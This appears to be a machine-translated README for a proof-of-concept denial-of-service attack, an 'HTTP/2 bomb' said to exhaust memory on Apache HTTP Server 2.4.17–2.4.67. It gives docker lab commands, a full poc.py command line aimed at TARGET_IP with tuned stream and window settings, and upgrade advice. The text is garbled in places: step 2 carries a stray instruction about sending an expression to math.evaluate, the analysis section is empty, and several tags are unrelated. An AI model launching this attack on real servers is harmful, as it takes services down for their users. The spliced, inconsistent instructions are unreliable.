0xc03307b/CVE-2026-49975

# CVE-2026-49975 HTTP/2 炸弹 ★ CVE-2026-49975 HTTP/2 Bomb PoC ★
# 概述
# 受影响版本 | 类别 | 版本 | |---|---| | **存在漏洞** | Apache HTTP Server **2.4.17 ≤ version ≤ 2.4.67** | | **已修复** | Apache HTTP Server **2.4.68 或更高版本** |
# 影响 - 远程拒绝服务 - 过度的内存消耗 - 正常用户请求的处理延迟或失败
# 环境 构建并运行存在漏洞的 Apache HTTP Server 环境。 ``` docker build -t cve-2026-49975 . docker run -d --name cve-2026-49975 --memory 8g -p 10081:80 cve-2026-49975 ```
# PoC 启动存在漏洞的环境后，请按照以下步骤复现攻击。 ## 步骤 1. 监控服务器内存使用情况 ``` docker stats cve-2026-49975 ``` 输出示例： ``` CONTAINER ID NAME CPU % MEM USAGE / LIMIT MEM % xxxxxxxxxxxx cve-2026-49975 0.5% 35.2MiB / 8.0GiB 1.7% ``` ## 步骤 2. 运行 HTTP/2 Bomb PoC 将以下表达式发送至 `math.evaluate`（例如，通过应用程序的计算输入框）。 ``` python3 poc.py \ --host TARGET_IP \ --port 10081 \ --connections 10 \ --streams 100 \ --refs 4091 \ --initial-window 0 \ --hold 300 \ --drip-interval 2 \ --drip-bytes 1 ``` ## 步骤 3. 确认结果 检查 Apache 容器的内存使用量是否增加，并在攻击流保持打开状态时持续居高不下。
# 缓解措施 - 将 Apache HTTP Server 升级至 2.4.68 或更高版本 - 如果服务不需要，考虑暂时禁用 HTTP/2
# 分析 - KR: - EN:

标签：Apache HTTP Server, HTTP/2, PoC, 安全漏洞, 拒绝服务攻击, 暴力破解, 漏洞复现, 请求拦截, 逆向工具, 配置错误